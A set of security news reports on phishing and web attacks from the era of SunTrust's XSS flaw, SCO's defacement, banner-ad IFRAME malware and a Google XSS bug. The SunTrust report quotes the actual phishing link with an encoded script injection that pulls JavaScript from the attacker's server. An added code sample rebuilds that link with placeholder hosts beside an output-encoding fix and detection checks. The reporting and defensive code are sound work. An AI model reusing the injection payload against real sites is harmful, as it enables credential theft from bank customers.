-
Tech Giants Target Phishing as New Threats Emerge
Yesterday should have been a day for headlines about progress in the battle against phishing scams. Instead, the news was dominated by a new threat that drove home the need for vigilance on the anti-phishing frontier.
Seeking swifter action against fast-moving phishing scams, some of the Internet's best-known service providers announced plans to share phishing attack data with one another and law enforcement agencies through Digital Phishnet. But even as this anti-phishing dream team was being unveiled, security researchers revealed a security hole that makes it easier for phishing operations to inject content into legitimate web sites.
Secunia documented a cross-browser security flaw that is likely to be rapidly adopted by phishing operations. The technique uses a specially crafted link to a legitimate website, which then enables the scammer to place content into pop-up windows opened during the session, including data collection forms that spoof the design of the legitimate site.
-
SunTrust site exploited by fraudsters
A facility in SunTrust Bank's www.suntrust.com web site is allowing fraudsters to inject their own code into the site to obtain SunTrust customer account authentication details. At least one fraudster has exploited this error by sending large numbers of emails purporting to be from SunTrust, asking the user to confirm their bank account on his form, which is executed from SunTrust's web site.
This makes the fraud much more convincing than traditional phishing mails, as the URL the SunTrust customer clicks on actually runs from the SunTrust site before loading JavaScript from the fraudster's server, located in Korea.
The JavaScript then changes the title of the page to "Suntrust Online Banking - Account Verification" and sets the window status to "Suntrust Online Banking", thereby preventing suspicious URLs from being displayed when the victim hovers their mouse cursor over a hyperlink. An 'iframe' is used to insert a form onto the page, which asks the customer to enter their Social Security number and SunTrust banking details. When the form is submitted, it is processed by a PHP script, allowing the attacker to capture the account details.
The phishing emails received by Netcraft contain the following HTML to create a hyperlink to the SunTrust web site:
<a href="http://www.suntrust.com/onlinestatements/index.asp?AccountVerify=df4g6 53432fvfdsGFSg45wgSVFwfvfVDFS54v54g5F42f543ff5445wv54w&promo=%22%3E%3Cscript +language%3Djavascript+src%3D%22http%3A%2F%2F%3211%2E1%375%2E176%2E179%2Fsun %2Fsun%2Ejs%22%3E%3C%2FSCRIPT%3E)http://www.suntrust.com/onlinestatements/in dex.asp?AccountVerify=df4g653432fvfdsGFSg45wgSVFwfvfVDFS54v54g5F42f543ff5445 wv54w&promo=%22%3E%3Cscript+language%3Djavascript+src%3D%22http%3A%2F%2F%321 1%2E1%375%2E176%2E179%2Fsun%2Fsun%2Ejs%22%3E%3C%2FSCRIPT%3E" target="_blank">click here.</td></tr></table></a>
One of the parameters supplied to the page is not properly encoded when the SunTrust site displays it, which allows an attacker to inject arbitrary HTML, including JavaScript that is executed by customers' web browsers. The highlighted portion of the URL, which unnecessarily appears twice, causes the following script to be inserted into the page:
<script language=javascript src="http://211.175.176.179/sun/sun.js"> </SCRIPT>
This in turn executes the JavaScript which is responsible for altering the contents of the page.
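The encoding failure described above, shown beside its fix as an added example (not code from Netcraft or SunTrust). The page template, the function names and the bank.example / other-host.example hosts are assumptions; only the promo parameter name and the shape of the injected value come from the link quoted above.

```javascript
// Added example; template, function names and hosts are hypothetical.
// Constructed sample link modelled on the quoted one (placeholder hosts).
const SAMPLE_LINK =
  "http://bank.example/onlinestatements/index.asp?AccountVerify=abc123" +
  "&promo=%22%3E%3Cscript+language%3Djavascript+src%3D%22" +
  "http%3A%2F%2Fother-host.example%2Fsun.js%22%3E%3C%2FSCRIPT%3E";

// Decode one query parameter as a form-handling server would ('+' is a space).
function getParam(link, name) {
  return new URL(link).searchParams.get(name);
}

// Vulnerable pattern (assumed template): decoded value pasted into markup.
function renderUnsafe(promo) {
  return '<input type="hidden" name="promo" value="' + promo + '">';
}

// Encode the characters that can end an attribute value or open a tag.
function encodeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Corrected pattern: same template, value encoded at output time.
function renderSafe(promo) {
  return '<input type="hidden" name="promo" value="' + encodeHtml(promo) + '">';
}

// Check usable in a test suite: did a script element reach the markup?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Mail- or proxy-side check: names of parameters whose decoded value
// contains markup characters, which a promotional code rarely needs.
function paramsWithMarkup(link) {
  const flagged = [];
  for (const [name, value] of new URL(link).searchParams) {
    if (/[<>"]/.test(value)) flagged.push(name);
  }
  return flagged;
}

const promo = getParam(SAMPLE_LINK, "promo");
console.log("unsafe render has <script>:", containsScriptTag(renderUnsafe(promo)));
console.log("safe render has <script>:  ", containsScriptTag(renderSafe(promo)));
console.log("flagged parameters:", paramsWithMarkup(SAMPLE_LINK));
```

The leading `">` in the decoded value is what closes the attribute and tag in the unsafe template; after encoding it stays inside the attribute as inert text.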
Fraudsters have noticed opportunities in SunTrust's internet banking operations previously, and a similar attack was executed in September.
Careless application errors and inadequate testing are believed to be an industry-wide problem for internet banking. Even though it would seem appalling to the man in the street that someone could run a fraud from a bank's own site, SunTrust's competitors are unlikely to be strongly critical, for fear of similar problems with their own facilities.
Netcraft has highlighted the threat of cross site scripting and script injection used for fraud, and provides a range of services for banks and other financial institutions to try and eliminate these kinds of errors from their systems, including comprehensive application testing and training for developers and designers of web based applications.
-
SCO “own all your code”
SCO's web site now proudly proclaims "We own all your code" and "pay us all your money".
Some people might claim that this just represents a simplification in SCO's stance on Unix intellectual property, but a closer look reveals that the prominent image on their home page was the work of an attacker.
In addition to the two comments made by the image, a woman is also depicted writing "Hacked by realloc()", which corresponds to the person responsible for an attack on the site yesterday.
The same image also appears on SCO's backup site, thescogroup.com. It is not yet known whether this attack is related to the recent web site outages experienced on the site.
-
The Register Among Sites Serving Banner Malware
Technology news site The Register today identified its ad serving provider, Falk AG, as the source of banner ads which spread an IFRAME exploit via its web site for more than six hours Saturday. The Register apologized to its readers and recommended that they check their machines for infections.
Reports Saturday noted that the exploit appeared on numerous European sites, but it appears U.S. sites may have been affected as well. An analysis of the exploit by LURHQ noted that "one of the hacked sites included a well-known Hollywood film studio's website." Falk AG's client list includes numerous entertainment properties, including NBC/Universal, The Golf Channel, The A&E Network and Sony Pictures Digital. The Dutch news site Nu.nl has also acknowledged hosting the banner exploits.
The Register said it is pursuing details of the event from Falk, which is expected to have public comment about the incident Monday. The LURHQ analysis said some versions of the complex exploit installed adware onto users' computers, while other versions downloaded a remote-access trojan.
-
IFRAME Exploit Spreading Through Banner Ads
Banner ads appearing on popular European web sites have been directing traffic to sites that install malware on visitors' computers, according to the Internet Storm Center. The attacks are exploiting an unpatched flaw in the way Internet Explorer 6 handles the IFRAME tag.
"Some high profile sites with banner ads are linking to servers that have the exploit and malicious code," according to an advisory on the ISC web site. The attack is an expanded version of banner-based exploits that first surfaced earlier this year. Banner networks, with their ability to place code on hundreds of outside sites, offer a vehicle for the rapid distribution of trojans and other malware, as well as a way to deface web pages. It is not clear whether the malicious code was being spread through a compromised ad server, or through specific banners submitted to ad networks.
-
Google sites plagued by phishing opportunities
A young Italian computer scientist has discovered another phishing opportunity on one of Google's web sites. This bug affects the googlesyndication.com domain, which Google use to serve their text and image based adverts.
The discovery comes only days after a similar bug was found with the Google Desktop search tool. As Google spread their technology over a greater number of application areas, the possibility for error increases, which could explain the recent stream of discoveries as they fall victim to public scrutiny.
The latest cross site scripting opportunity exploits a flaw in the User Feedback section of Google's advertising system. This allows an attacker to inject their own content onto the page, which could lead to fraudulent activity or phishing. An attacker can exploit this vulnerability to affect any browser which has JavaScript enabled, including Microsoft Internet Explorer and Mozilla Firefox.
Salvatore Aranzulla's web site contains information about his discovery of the bug (Italian). He also demonstrates some URLs that can be used to exploit the bug.